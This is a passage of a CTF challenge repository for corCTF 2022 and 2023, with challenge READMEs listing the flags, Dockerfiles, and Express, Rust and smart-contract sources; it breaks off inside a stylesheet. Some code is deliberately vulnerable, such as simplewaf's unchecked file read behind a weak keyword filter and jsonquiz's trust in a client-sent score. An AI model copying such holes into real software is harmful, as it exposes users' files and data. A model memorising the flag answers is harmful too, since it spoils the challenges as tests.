--------------------------------------------------------------------------------
https://raw.githubusercontent.com/strellic/my-ctf-challenges/8a8e36fd400c3900837c2faafba456c17ce1f28c/corCTF-2022/pwn/solidarity/task/solidarity-server


--------------------------------------------------------------------------------
/corCTF-2022/pwn/solidarity/task/solidarity.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/strellic/my-ctf-challenges/8a8e36fd400c3900837c2faafba456c17ce1f28c/corCTF-2022/pwn/solidarity/task/solidarity.so


--------------------------------------------------------------------------------
/corCTF-2022/web/jsonquiz/README.md:
--------------------------------------------------------------------------------
 1 | Solves: jsonquiz
 2 | 
 3 | Author: strellic
 4 | 
 5 | Description:
 6 | 
 7 | How well do you know JSON? Take this quiz and find out!
 8 | 
 9 | Flag: `corctf{th3_linkedin_JSON_quiz_is_too_h4rd!!!}`
10 | 


--------------------------------------------------------------------------------
/corCTF-2022/web/jsonquiz/task/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM node:18.1.0-bullseye-slim
2 | WORKDIR /app
3 | COPY package.json ./
4 | COPY static ./static
5 | RUN npm i
6 | COPY app.js .
7 | CMD ["node", "app.js"]
8 | 


--------------------------------------------------------------------------------
/corCTF-2022/web/jsonquiz/task/app.js:
--------------------------------------------------------------------------------
 1 | const express = require("express");
 2 | 
 3 | const PORT = process.env.PORT || 4455;
 4 | const FLAG = process.env.FLAG || "test_flag";
 5 | 
 6 | const app = express();
 7 | 
 8 | app.use(express.urlencoded({ extended: false }));
 9 | app.use(express.static("static"));
10 | 
11 | app.post("/submit", (req, res) => {
12 |     let score = req.body.score;
13 |     if (!score) score = 0;
14 |     if (Number(score) >= 15) {
15 |         res.json({ pass: true, flag: FLAG });
16 |     }
17 |     else {
18 |         res.json({ pass: false });
19 |     }
20 | });
21 | 
22 | app.listen(PORT, () => console.log(`web/jsonquiz listening on port ${PORT}`));


--------------------------------------------------------------------------------
/corCTF-2022/web/jsonquiz/task/package.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "name": "jsonquiz",
 3 |   "version": "1.0.0",
 4 |   "description": "",
 5 |   "main": "app.js",
 6 |   "scripts": {
 7 |     "test": "echo \"Error: no test specified\" && exit 1"
 8 |   },
 9 |   "author": "",
10 |   "license": "ISC",
11 |   "dependencies": {
12 |     "express": "^4.18.1"
13 |   }
14 | }
15 | 


--------------------------------------------------------------------------------
/corCTF-2022/web/jsonquiz/task/static/assets/css/styles.css:
--------------------------------------------------------------------------------
 1 | body {
 2 |   background-color: #121212;
 3 |   overflow-x: hidden;
 4 | }
 5 | 
 6 | label {
 7 |   color: white;
 8 | }
 9 | 
10 | #remaining {
11 |   display: inline;
12 | }
13 | 
14 | #quiz {
15 |   position: relative;
16 | }
17 | 
18 | .question {
19 |   position: absolute;
20 |   top: 0;
21 | }
22 | 


--------------------------------------------------------------------------------
/corCTF-2022/web/modernblog/README.md:
--------------------------------------------------------------------------------
 1 | Solves: 1
 2 | 
 3 | Author: strellic
 4 | 
 5 | Description:
 6 | 
 7 | React is so cool and modern, I wrote a simple blogging platform on it!
 8 | 
 9 | Flag: `corctf{r3act_actu4lly_1snt_th4t_m0dern}`
10 | 


--------------------------------------------------------------------------------
/corCTF-2022/web/modernblog/task/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM node:18.1.0-bullseye-slim
2 | WORKDIR /app
3 | COPY ./server/package.json ./server/package-lock.json ./
4 | RUN --mount=type=cache,target=/root/.npm npm ci
5 | COPY ./server .
6 | CMD ["node", "index.js"]
7 | 


--------------------------------------------------------------------------------
/corCTF-2022/web/modernblog/task/client/index.html:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | <html lang="en">
 3 |   <head>
 4 |     <meta charset="UTF-8" />
 5 |     <meta name="viewport" content="width=device-width, initial-scale=1.0" />
 6 |     <title>modernblog</title>
 7 |   </head>
 8 |   <body>
 9 |     <div id="root"></div>
10 |     <script type="module" src="/src/main.jsx"></script>
11 |   </body>
12 | </html>


--------------------------------------------------------------------------------
/corCTF-2022/web/modernblog/task/client/package.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "name": "client",
 3 |   "private": true,
 4 |   "version": "0.0.0",
 5 |   "scripts": {
 6 |     "dev": "vite",
 7 |     "build": "vite build",
 8 |     "preview": "vite preview"
 9 |   },
10 |   "dependencies": {
11 |     "@chakra-ui/react": "^2.1.2",
12 |     "@emotion/react": "^11.9.0",
13 |     "@emotion/styled": "^11.8.1",
14 |     "framer-motion": "^6.3.4",
15 |     "react": "^18.0.0",
16 |     "react-dom": "^18.0.0",
17 |     "react-router-dom": "^6.3.0"
18 |   },
19 |   "devDependencies": {
20 |     "@types/react": "^18.0.0",
21 |     "@types/react-dom": "^18.0.0",
22 |     "@vitejs/plugin-react": "^1.3.0",
23 |     "vite": "^2.9.9"
24 |   }
25 | }
26 | 


--------------------------------------------------------------------------------
/corCTF-2022/web/modernblog/task/client/src/main.jsx:
--------------------------------------------------------------------------------
 1 | import React from 'react';
 2 | import ReactDOM from 'react-dom/client';
 3 | import { BrowserRouter } from 'react-router-dom';
 4 | import { ChakraProvider } from '@chakra-ui/react';
 5 | import { Routes, Route, Link } from 'react-router-dom';
 6 | 
 7 | import Index from './pages/Index';
 8 | import Register from './pages/Register';
 9 | import Login from './pages/Login';
10 | import Home from './pages/Home';
11 | import Post from './pages/Post';
12 | 
13 | ReactDOM.createRoot(document.getElementById('root')).render(
14 |   <React.StrictMode>
15 |     <ChakraProvider>
16 |       <BrowserRouter>
17 |         <Routes>
18 |           <Route path="/" element={<Index />} />
19 |           <Route path="/register" element={<Register />} />
20 |           <Route path="/login" element={<Login />} />
21 |           <Route path="/home" element={<Home />} />
22 |           <Route path="/post/:id" element={<Post />} />
23 |         </Routes>
24 |       </BrowserRouter>
25 |     </ChakraProvider>
26 |   </React.StrictMode>
27 | );
28 | 


--------------------------------------------------------------------------------
/corCTF-2022/web/modernblog/task/client/vite.config.js:
--------------------------------------------------------------------------------
 1 | import { defineConfig } from 'vite'
 2 | import react from '@vitejs/plugin-react'
 3 | 
 4 | // https://vitejs.dev/config/
 5 | export default defineConfig({
 6 |   plugins: [react()],
 7 |   build: { sourcemap: true },
 8 |   server: { 
 9 |     proxy: {
10 |       '/api': 'http://localhost:8080'
11 |     }
12 |   }
13 | })
14 | 


--------------------------------------------------------------------------------
/corCTF-2022/web/modernblog/task/server/package.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "name": "server",
 3 |   "version": "1.0.0",
 4 |   "description": "",
 5 |   "main": "index.js",
 6 |   "scripts": {
 7 |     "test": "echo \"Error: no test specified\" && exit 1"
 8 |   },
 9 |   "author": "Strellic",
10 |   "license": "ISC",
11 |   "dependencies": {
12 |     "express": "^4.18.1",
13 |     "express-session": "^1.17.3",
14 |     "memorystore": "^1.6.7"
15 |   }
16 | }
17 | 


--------------------------------------------------------------------------------
/corCTF-2022/web/modernblog/task/server/public/index.html:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | <html lang="en">
 3 |   <head>
 4 |     <meta charset="UTF-8" />
 5 |     <meta name="viewport" content="width=device-width, initial-scale=1.0" />
 6 |     <title>modernblog</title>
 7 |     <script type="module" crossorigin src="/assets/index.7352e15a.js"></script>
 8 |   </head>
 9 |   <body>
10 |     <div id="root"></div>
11 |     
12 |   </body>
13 | </html>


--------------------------------------------------------------------------------
/corCTF-2022/web/rustshop/README.md:
--------------------------------------------------------------------------------
 1 | Solves: 13
 2 | 
 3 | Author: strellic
 4 | 
 5 | Description:
 6 | 
 7 | rustshop: the ultimate store for all Rust users!
 8 | 
 9 | Flag: `corctf{we_d0_s0me_s3rde_shen4nigans}`
10 | 


--------------------------------------------------------------------------------
/corCTF-2022/web/rustshop/task/Dockerfile:
--------------------------------------------------------------------------------
 1 | FROM rust:slim
 2 | 
 3 | WORKDIR /app
 4 | 
 5 | COPY ./server .
 6 | 
 7 | RUN cargo build --release
 8 | 
 9 | CMD ["./target/release/rustshop"]
10 | 


--------------------------------------------------------------------------------
/corCTF-2022/web/rustshop/task/client/Cargo.toml:
--------------------------------------------------------------------------------
 1 | [package]
 2 | name = "client"
 3 | version = "0.1.0"
 4 | edition = "2021"
 5 | 
 6 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html
 7 | 
 8 | [dependencies]
 9 | log = "0.4.17"
10 | reqwasm = "0.5.0"
11 | serde = { version = "1.0.137", features = ["derive"] }
12 | serde_json = "1.0.81"
13 | wasm-bindgen = "0.2.80"
14 | wasm-bindgen-futures = "0.4.30"
15 | wasm-logger = "0.2.0"
16 | web-sys = { version = "0.3.58", features = ["HtmlDocument", "Location"] }
17 | yew = "0.19"
18 | yew-router = "0.16.0"
19 | 


--------------------------------------------------------------------------------
/corCTF-2022/web/rustshop/task/client/Trunk.toml:
--------------------------------------------------------------------------------
1 | [build]
2 | target = "index.html"
3 | release = true
4 | dist = "dist"
5 | public_url = "/assets/"
6 | filehash = true
7 | 


--------------------------------------------------------------------------------
/corCTF-2022/web/rustshop/task/client/index.html:
--------------------------------------------------------------------------------
1 | <!DOCTYPE html>
2 | <html>
3 |   <head>
4 |     <meta charset="utf-8" />
5 |     <meta name="viewport" content="width=device-width, initial-scale=1">
6 |     <title>rustshop</title>
7 |     <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bulma@0.9.4/css/bulma.min.css">
8 |   </head>
9 | </html>


--------------------------------------------------------------------------------
/corCTF-2022/web/rustshop/task/client/src/components.rs:
--------------------------------------------------------------------------------
1 | pub mod hero;
2 | pub mod navbar;
3 | pub mod shop;
4 | pub mod user;
5 | 


--------------------------------------------------------------------------------
/corCTF-2022/web/rustshop/task/client/src/components/hero.rs:
--------------------------------------------------------------------------------
 1 | use yew::prelude::*;
 2 | 
 3 | #[function_component(Hero)]
 4 | pub fn hero() -> Html {
 5 |     html! {
 6 |         <section class="hero is-info section">
 7 |             <div class="container">
 8 |                 <p class="title has-text-weight-bold">
 9 |                     {"🦀 rustshop 🦀"}
10 |                 </p>
11 |                 <p class="subtitle">
12 |                     {"the only shop containing everything a rust user needs!"}
13 |                 </p>
14 |             </div>
15 |         </section>
16 |     }
17 | }
18 | 


--------------------------------------------------------------------------------
/corCTF-2022/web/rustshop/task/client/src/components/user.rs:
--------------------------------------------------------------------------------
 1 | use yew::prelude::*;
 2 | 
 3 | use crate::User as BaseUser;
 4 | 
 5 | #[derive(Properties, PartialEq)]
 6 | pub struct UserProps {
 7 |     pub user: BaseUser,
 8 | }
 9 | 
10 | #[function_component(User)]
11 | pub fn user(props: &UserProps) -> Html {
12 |     html! {
13 |         <>
14 |             <p class="title is-size-3">{"Hello, "}{props.user.username.to_string()}{"!"}</p>
15 |             <p class="title is-size-5 mb-0">{"Money: "}{props.user.money}{" credits"}</p>
16 |             <p class="title is-size-5 mt-1 mb-0">{"Items: "}</p>
17 |             {
18 |                 props.user.items.clone().into_iter().map(|item| html! {
19 |                     <p class="is-size-6">{item.name}{" - "}{item.quantity}{"x"}</p>
20 |                 }).collect::<Html>()
21 |             }
22 |         </>
23 |     }
24 | }
25 | 


--------------------------------------------------------------------------------
/corCTF-2022/web/rustshop/task/client/src/routes.rs:
--------------------------------------------------------------------------------
1 | pub mod home;
2 | pub mod login;
3 | pub mod register;
4 | 


--------------------------------------------------------------------------------
/corCTF-2022/web/rustshop/task/hint.txt:
--------------------------------------------------------------------------------
1 | hint: the client isn't vulnerable, you just need to look at the server code. i just wanted to learn client-side rust :)
2 | 


--------------------------------------------------------------------------------
/corCTF-2022/web/rustshop/task/server/Cargo.toml:
--------------------------------------------------------------------------------
 1 | [package]
 2 | name = "rustshop"
 3 | version = "0.1.0"
 4 | edition = "2021"
 5 | 
 6 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html
 7 | 
 8 | [dependencies]
 9 | axum = { version = "0.5.6", features = ["headers"] }
10 | axum-extra = { version = "0.3.4", features = ["spa"] }
11 | clokwerk = "0.3.5"
12 | dashmap = "5.3.4"
13 | once_cell = "1.12.0"
14 | rand = "0.8.5"
15 | serde = { version = "1.0.137", features = ["derive"] }
16 | serde_json = "1.0.81"
17 | sha2 = "0.10.2"
18 | tokio = { version = "1.18.2", features = ["full"] }
19 | tower-cookies = "0.6.0"
20 | 


--------------------------------------------------------------------------------
/corCTF-2022/web/rustshop/task/server/src/routes.rs:
--------------------------------------------------------------------------------
1 | pub mod api;
2 | 


--------------------------------------------------------------------------------
/corCTF-2022/web/rustshop/task/server/static/client-165abaf50c73f044_bg.wasm:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/strellic/my-ctf-challenges/8a8e36fd400c3900837c2faafba456c17ce1f28c/corCTF-2022/web/rustshop/task/server/static/client-165abaf50c73f044_bg.wasm


--------------------------------------------------------------------------------
/corCTF-2022/web/rustshop/task/server/static/index.html:
--------------------------------------------------------------------------------
1 | <!DOCTYPE html><html><head>
2 |     <meta charset="utf-8">
3 |     <meta name="viewport" content="width=device-width, initial-scale=1">
4 |     <title>rustshop</title>
5 |     <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bulma@0.9.4/css/bulma.min.css">
6 |   
7 | <link rel="preload" href="/assets/client-165abaf50c73f044_bg.wasm" as="fetch" type="application/wasm" crossorigin="">
8 | <link rel="modulepreload" href="/assets/client-165abaf50c73f044.js"></head>
9 | <body><script type="module">import init from '/assets/client-165abaf50c73f044.js';init('/assets/client-165abaf50c73f044_bg.wasm');</script></body></html>


--------------------------------------------------------------------------------
/corCTF-2022/web/simplewaf/README.md:
--------------------------------------------------------------------------------
 1 | Solves: 28
 2 | 
 3 | Author: strellic
 4 | 
 5 | Description:
 6 | 
 7 | I made my first website and web app in NodeJS!
 8 | 
 9 | You want my flags? Good luck getting past my WAF...
10 | 
11 | Flag: `corctf{hmm_th4t_waf_w4snt_s0_s1mple}`
12 | 


--------------------------------------------------------------------------------
/corCTF-2022/web/simplewaf/task/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM node:18.1.0-bullseye-slim
2 | WORKDIR /app
3 | COPY . ./
4 | RUN npm i
5 | CMD ["node", "main.js"]


--------------------------------------------------------------------------------
/corCTF-2022/web/simplewaf/task/flag.txt:
--------------------------------------------------------------------------------
1 | corctf{hmm_th4t_waf_w4snt_s0_s1mple}


--------------------------------------------------------------------------------
/corCTF-2022/web/simplewaf/task/index.html:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | <html>
 3 |     <head>
 4 |         <title>my first web app</title>
 5 |     </head>
 6 |     <body>
 7 |         <h1>Welcome to my first web app!!!</h1>
 8 |         <p>NodeJS and express are so cool :)</p>
 9 |         <p>Check out <a href="/?file=wow.html">this page</a>!!!</p>
10 |         <br><br><br><br><br>
11 |         <p>EDIT: some hackers are being rude and stealing my flags, so i changed my code :) id like to see you try now</p>
12 |     </body>
13 | </html>


--------------------------------------------------------------------------------
/corCTF-2022/web/simplewaf/task/main.js:
--------------------------------------------------------------------------------
 1 | const express = require("express");
 2 | const fs = require("fs");
 3 | 
 4 | const app = express();
 5 | 
 6 | const PORT = process.env.PORT || 3456;
 7 | 
 8 | app.use((req, res, next) => {
 9 |     if([req.body, req.headers, req.query].some(
10 |         (item) => item && JSON.stringify(item).includes("flag")
11 |     )) {
12 |         return res.send("bad hacker!");
13 |     }
14 |     next();
15 | });
16 | 
17 | app.get("/", (req, res) => {
18 |     try {
19 |         res.setHeader("Content-Type", "text/html");
20 |         res.send(fs.readFileSync(req.query.file || "index.html").toString());       
21 |     }
22 |     catch(err) {
23 |         console.log(err);
24 |         res.status(500).send("Internal server error");
25 |     }
26 | });
27 | 
28 | app.listen(PORT, () => console.log(`web/simplewaf listening on port ${PORT}`));


--------------------------------------------------------------------------------
/corCTF-2022/web/simplewaf/task/package.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "name": "simplewaf",
 3 |   "version": "1.0.0",
 4 |   "description": "",
 5 |   "main": "main.js",
 6 |   "scripts": {
 7 |     "test": "echo \"Error: no test specified\" && exit 1"
 8 |   },
 9 |   "author": "Strellic",
10 |   "license": "ISC",
11 |   "dependencies": {
12 |     "express": "^4.18.1"
13 |   }
14 | }
15 | 


--------------------------------------------------------------------------------
/corCTF-2022/web/simplewaf/task/styles.css:
--------------------------------------------------------------------------------
1 | body { 
2 |     font-family: sans-serif;
3 |     padding-left: 30px;
4 |     padding-top: 15px;
5 | }


--------------------------------------------------------------------------------
/corCTF-2022/web/simplewaf/task/wow.html:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | <html>
 3 |     <head>
 4 |         <title>WOW</title>
 5 |     </head>
 6 |     <body>
 7 |         <h1>i love HTML!</h1>
 8 |         <p>HTML is my favorite programming language :)</p>
 9 |     </body>
10 | </html>


--------------------------------------------------------------------------------
/corCTF-2023/blockchain/baby-wallet/98-start-gunicorn:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | PYTHONUNBUFFERED=true gunicorn \
 4 |     --user ctf \
 5 |     --group ctf \
 6 |     --bind 0.0.0.0:$HTTP_PORT \
 7 |     --daemon \
 8 |     --workers 4 \
 9 |     --threads 4 \
10 |     --access-logfile /var/log/ctf/gunicorn.access.log \
11 |     --error-logfile /var/log/ctf/gunicorn.error.log \
12 |     --capture-output \
13 |     --log-level debug \
14 |     eth_sandbox.server:app
15 | 


--------------------------------------------------------------------------------
/corCTF-2023/blockchain/baby-wallet/Dockerfile:
--------------------------------------------------------------------------------
 1 | FROM gcr.io/paradigmxyz/ctf/base:latest
 2 | 
 3 | ENV HTTP_PORT=8545
 4 | 
 5 | COPY requirements.txt /root
 6 | 
 7 | RUN python3 -m pip install -r /root/requirements.txt 
 8 | 
 9 | RUN true \
10 |     && curl -L https://foundry.paradigm.xyz | bash \
11 |     && bash -c "source /root/.bashrc && foundryup" \
12 |     && chmod 755 -R /root \
13 |     && true
14 | 
15 | COPY 98-start-gunicorn /startup
16 | 
17 | COPY eth_sandbox /usr/lib/python/eth_sandbox
18 | 
19 | RUN curl https://raw.githubusercontent.com/lunixbochs/mpwn/master/mp.py -o /usr/lib/python/mp.py
20 | RUN curl https://raw.githubusercontent.com/google/kctf/master/docker-images/challenge/pow.py -o /usr/lib/python/pow.py
21 | ENV PYTHONPATH /usr/lib/python
22 | 
23 | COPY deploy/ /home/ctf/
24 | 
25 | COPY contracts /tmp/contracts
26 | 
27 | RUN true \
28 |     && cd /tmp \
29 |     && /root/.foundry/bin/forge build --out /home/ctf/compiled \
30 |     && rm -rf /tmp/contracts \
31 |     && true
32 | 


--------------------------------------------------------------------------------
/corCTF-2023/blockchain/baby-wallet/README.md:
--------------------------------------------------------------------------------
1 | Solves: 24
2 | 
3 | Author: Strellic
4 | 
5 | Description:
6 | 
7 | I wrote my first Solidity smart contract!
8 | 
9 | Flag: `corctf{inf1nite_m0ney_glitch!!!}`


--------------------------------------------------------------------------------
/corCTF-2023/blockchain/baby-wallet/contracts/Setup.sol:
--------------------------------------------------------------------------------
 1 | pragma solidity ^0.8.17;
 2 | 
 3 | import "./BabyWallet.sol";
 4 | 
 5 | contract Setup {
 6 |     BabyWallet public wallet;
 7 | 
 8 |     constructor() payable {
 9 |         require(msg.value == 100 ether, "requires 100 ether");
10 |         wallet = new BabyWallet();
11 |         payable(address(wallet)).transfer(msg.value);
12 |     }
13 | 
14 |     function isSolved() public view returns (bool) {
15 |         return address(wallet).balance == 0 ether;
16 |     }
17 | }


--------------------------------------------------------------------------------
/corCTF-2023/blockchain/baby-wallet/deploy/chal.py:
--------------------------------------------------------------------------------
 1 | import json
 2 | from pathlib import Path
 3 | 
 4 | import eth_sandbox
 5 | from web3 import Web3
 6 | 
 7 | def deploy(web3: Web3, deployer_address: str, player_address: str) -> str:
 8 |     rcpt = eth_sandbox.sendTransaction(web3, {
 9 |         "from": deployer_address,
10 |         "value": Web3.toWei(100, 'ether'),
11 |         "data": json.loads(Path("compiled/Setup.sol/Setup.json").read_text())["bytecode"]["object"],
12 |     })
13 | 
14 |     return rcpt.contractAddress
15 | 
16 | eth_sandbox.run_launcher([
17 |     eth_sandbox.get_ticket_action(),
18 |     eth_sandbox.new_launch_instance_action(deploy),
19 |     eth_sandbox.new_kill_instance_action(),
20 |     eth_sandbox.new_get_flag_action()
21 | ])
22 | 


--------------------------------------------------------------------------------
/corCTF-2023/blockchain/baby-wallet/eth_sandbox/__init__.py:
--------------------------------------------------------------------------------
1 | from .auth import *
2 | from .launcher import *
3 | 


--------------------------------------------------------------------------------
/corCTF-2023/blockchain/baby-wallet/eth_sandbox/auth.py:
--------------------------------------------------------------------------------
1 | import os
2 | 
3 | def get_shared_secret():
4 |     return os.getenv("SHARED_SECRET", "paradigm-ctf")


--------------------------------------------------------------------------------
/corCTF-2023/blockchain/baby-wallet/requirements.txt:
--------------------------------------------------------------------------------
 1 | aiohttp==3.8.1
 2 | aiosignal==1.2.0
 3 | async-timeout==4.0.2
 4 | attrs==22.1.0
 5 | base58==2.1.1
 6 | bitarray==2.6.0
 7 | certifi==2022.6.15
 8 | charset-normalizer==2.1.0
 9 | click==8.1.3
10 | cytoolz==0.12.0
11 | eth-abi==2.2.0
12 | eth-account==0.5.9
13 | eth-hash==0.5.0
14 | eth-keyfile==0.5.1
15 | eth-keys==0.3.4
16 | eth-rlp==0.2.1
17 | eth-typing==2.3.0
18 | eth-utils==1.9.5
19 | Flask==2.2.2
20 | Flask-Cors==3.0.10
21 | frozenlist==1.3.1
22 | gunicorn==20.1.0
23 | hexbytes==0.2.3
24 | idna==3.3
25 | importlib-metadata==4.12.0
26 | ipfshttpclient==0.8.0a2
27 | itsdangerous==2.1.2
28 | Jinja2==3.1.2
29 | jsonschema==4.10.0
30 | lru-dict==1.1.8
31 | MarkupSafe==2.1.1
32 | multiaddr==0.0.9
33 | multidict==6.0.2
34 | netaddr==0.8.0
35 | parsimonious==0.8.1
36 | protobuf==3.20.1
37 | pycryptodome==3.15.0
38 | pyrsistent==0.18.1
39 | requests==2.28.1
40 | rlp==2.0.1
41 | six==1.16.0
42 | toolz==0.12.0
43 | urllib3==1.26.11
44 | varint==1.0.2
45 | web3==5.30.0
46 | websockets==9.1
47 | Werkzeug==2.2.2
48 | yarl==1.8.1
49 | zipp==3.8.1
50 | gmpy2==2.1.5
51 | ecdsa==0.18.0


--------------------------------------------------------------------------------
/corCTF-2023/blockchain/tribunal/README.md:
--------------------------------------------------------------------------------
 1 | Solves: 10
 2 | 
 3 | Author: Strellic
 4 | 
 5 | Description:
 6 | 
 7 | The yearly CoR tribunal is upon us, and issues vital to the long-term survival of our CTF team are being discussed.
 8 | 
 9 | I learned from my mistakes last year, so now this smart contract is much more secure!
10 | 
11 | Flag: `corctf{its_y0ur_time_to_f4ce_the_CoR_tribunal}`


--------------------------------------------------------------------------------
/corCTF-2023/blockchain/tribunal/challenge/Dockerfile:
--------------------------------------------------------------------------------
 1 | FROM debian:bullseye-slim
 2 | COPY --from=krallin/ubuntu-tini /usr/bin/tini /tini
 3 | ENTRYPOINT ["/tini", "--"]
 4 | 
 5 | RUN apt-get update && \
 6 |     apt-get -y install libudev-dev libssl-dev pkg-config && \
 7 |     rm -rf /var/lib/apt/lists/*
 8 | 
 9 | WORKDIR /app
10 | COPY tribunal-server tribunal.so art.txt ./
11 | 
12 | EXPOSE 8080
13 | USER nobody
14 | CMD ["/app/tribunal-server"]


--------------------------------------------------------------------------------
/corCTF-2023/blockchain/tribunal/challenge/tribunal-server:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/strellic/my-ctf-challenges/8a8e36fd400c3900837c2faafba456c17ce1f28c/corCTF-2023/blockchain/tribunal/challenge/tribunal-server


--------------------------------------------------------------------------------
/corCTF-2023/blockchain/tribunal/challenge/tribunal.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/strellic/my-ctf-challenges/8a8e36fd400c3900837c2faafba456c17ce1f28c/corCTF-2023/blockchain/tribunal/challenge/tribunal.so


--------------------------------------------------------------------------------
/corCTF-2023/blockchain/tribunal/program/Cargo.toml:
--------------------------------------------------------------------------------
 1 | [package]
 2 | name = "tribunal"
 3 | version = "1.0.0"
 4 | edition = "2021"
 5 | 
 6 | [features]
 7 | no-entrypoint = []
 8 | 
 9 | [dependencies]
10 | borsh = "0.10.3"
11 | borsh-derive = "0.10.3"
12 | solana-program = "1.16.5"
13 | 
14 | [lib]
15 | crate-type = ["cdylib", "lib"]


--------------------------------------------------------------------------------
/corCTF-2023/blockchain/tribunal/program/Makefile:
--------------------------------------------------------------------------------
1 | .PHONY: build
2 | build:
3 | 	cargo build-bpf
4 | 	cp ./target/deploy/tribunal.so ../challenge
5 | 


--------------------------------------------------------------------------------
/corCTF-2023/blockchain/tribunal/program/src/entrypoint.rs:
--------------------------------------------------------------------------------
 1 | #![cfg(not(feature = "no-entrypoint"))]
 2 | 
 3 | use solana_program::{
 4 |     account_info::AccountInfo, entrypoint, entrypoint::ProgramResult, pubkey::Pubkey,
 5 | };
 6 | 
 7 | entrypoint!(process_instruction);
 8 | fn process_instruction(
 9 |     program_id: &Pubkey,
10 |     accounts: &[AccountInfo],
11 |     instruction_data: &[u8],
12 | ) -> ProgramResult {
13 |     crate::processor::process_instruction(program_id, accounts, instruction_data)
14 | }
15 | 


--------------------------------------------------------------------------------
/corCTF-2023/blockchain/tribunal/program/src/lib.rs:
--------------------------------------------------------------------------------
1 | mod entrypoint;
2 | pub mod processor;
3 | 


--------------------------------------------------------------------------------
/corCTF-2023/blockchain/tribunal/server/Cargo.toml:
--------------------------------------------------------------------------------
 1 | [package]
 2 | name = "tribunal-server"
 3 | version = "1.0.0"
 4 | edition = "2021"
 5 | rust-version = "1.59"
 6 | 
 7 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html
 8 | 
 9 | [dependencies]
10 | solana-program-test = "1.9.13"
11 | solana-program = "1.9.13"
12 | solana-logger = "1.9.13"
13 | solana-sdk = "1.9.13"
14 | spl-token = "3.3.0"
15 | sol-ctf-framework = { git = "https://github.com/otter-sec/sol-ctf-framework", branch="rewrite-v2" }
16 | threadpool = "1.8.1"
17 | borsh = "0.10.3"
18 | 


--------------------------------------------------------------------------------
/corCTF-2023/blockchain/tribunal/server/Makefile:
--------------------------------------------------------------------------------
1 | .PHONY: build
2 | build:
3 | 	cargo build --release
4 | 	cp ./target/release/tribunal-server ../challenge


--------------------------------------------------------------------------------
/corCTF-2023/misc/msfrogofwar2/README.md:
--------------------------------------------------------------------------------
1 | Solves: 5
2 | 
3 | Author: Strellic
4 | 
5 | Description:
6 | 
7 | ![msfrog](https://cdn.discordapp.com/attachments/808464388188405790/1003002482072502292/msfrog.png)
8 | 
9 | Flag: `corctf{If you know the enemy and know yourself, you need not fear the croaks of a hundred frogs - Sun Tzu}`


--------------------------------------------------------------------------------
/corCTF-2023/misc/msfrogofwar2/chall/Dockerfile:
--------------------------------------------------------------------------------
 1 | FROM python:3.9.17-bookworm
 2 | 
 3 | RUN apt-get update && apt-get install curl unzip -y && rm -rf /var/lib/apt/lists/*
 4 | 
 5 | RUN mkdir -p /app
 6 | 
 7 | WORKDIR /app
 8 | 
 9 | COPY requirements.txt .
10 | 
11 | RUN pip install -r requirements.txt
12 | 
13 | COPY . .
14 | 
15 | RUN curl -L https://github.com/official-stockfish/Stockfish/releases/download/sf_16/stockfish-ubuntu-x86-64-avx2.tar --output stockfish-ubuntu-x86-64-avx2.tar
16 | 
17 | RUN tar xvf stockfish-ubuntu-x86-64-avx2.tar
18 | 
19 | CMD ["sh", "start.sh"]


--------------------------------------------------------------------------------
/corCTF-2023/misc/msfrogofwar2/chall/requirements.txt:
--------------------------------------------------------------------------------
 1 | bidict==0.21.2
 2 | click==8.0.1
 3 | dnspython==1.16.0
 4 | eventlet==0.30.2
 5 | Flask==2.0.1
 6 | Flask-SocketIO==5.1.1
 7 | greenlet==1.1.1
 8 | gunicorn==20.1.0
 9 | itsdangerous==2.0.1
10 | Jinja2==3.0.1
11 | MarkupSafe==2.0.1
12 | python-engineio==4.2.1
13 | python-socketio==5.4.0
14 | six==1.16.0
15 | Werkzeug==2.0.1
16 | stockfish==3.28.0


--------------------------------------------------------------------------------
/corCTF-2023/misc/msfrogofwar2/chall/start.sh:
--------------------------------------------------------------------------------
1 | gunicorn --worker-class eventlet -w 1 --bind 0.0.0.0:8080 app:app
2 | 


--------------------------------------------------------------------------------
/corCTF-2023/misc/msfrogofwar2/chall/static/css/chessboard-1.0.0.min.css:
--------------------------------------------------------------------------------
1 | /*! chessboard.js v1.0.0 | (c) 2019 Chris Oakman | MIT License chessboardjs.com/license */
2 | .clearfix-7da63{clear:both}.board-b72b1{border:2px solid #404040;box-sizing:content-box}.square-55d63{float:left;position:relative;-webkit-touch-callout:none;-webkit-user-select:none;-khtml-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none}.white-1e1d7{background-color:#f0d9b5;color:#b58863}.black-3c85d{background-color:#b58863;color:#f0d9b5}.highlight1-32417,.highlight2-9c5d2{box-shadow:inset 0 0 3px 3px #ff0}.notation-322f9{cursor:default;font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;font-size:14px;position:absolute}.alpha-d2270{bottom:1px;right:3px}.numeric-fc462{top:2px;left:2px}


--------------------------------------------------------------------------------
/corCTF-2023/misc/msfrogofwar2/chall/static/css/styles.css:
--------------------------------------------------------------------------------
 1 | body {
 2 |   background-color: #161925;
 3 |   height: 100vh;
 4 |   cursor: url("/img/msfrogcursor.png"), auto;
 5 | }
 6 | 
 7 | h1, h2, h3, h4, h5, h6 {
 8 |   color: #f1f2f6;
 9 | }
10 | 
11 | .card-title, .card-text {
12 |   color: #161925;
13 | }
14 | 
15 | .chessboard-parent {
16 |     width: 75vh;
17 | }
18 | 
19 | #chessboard {
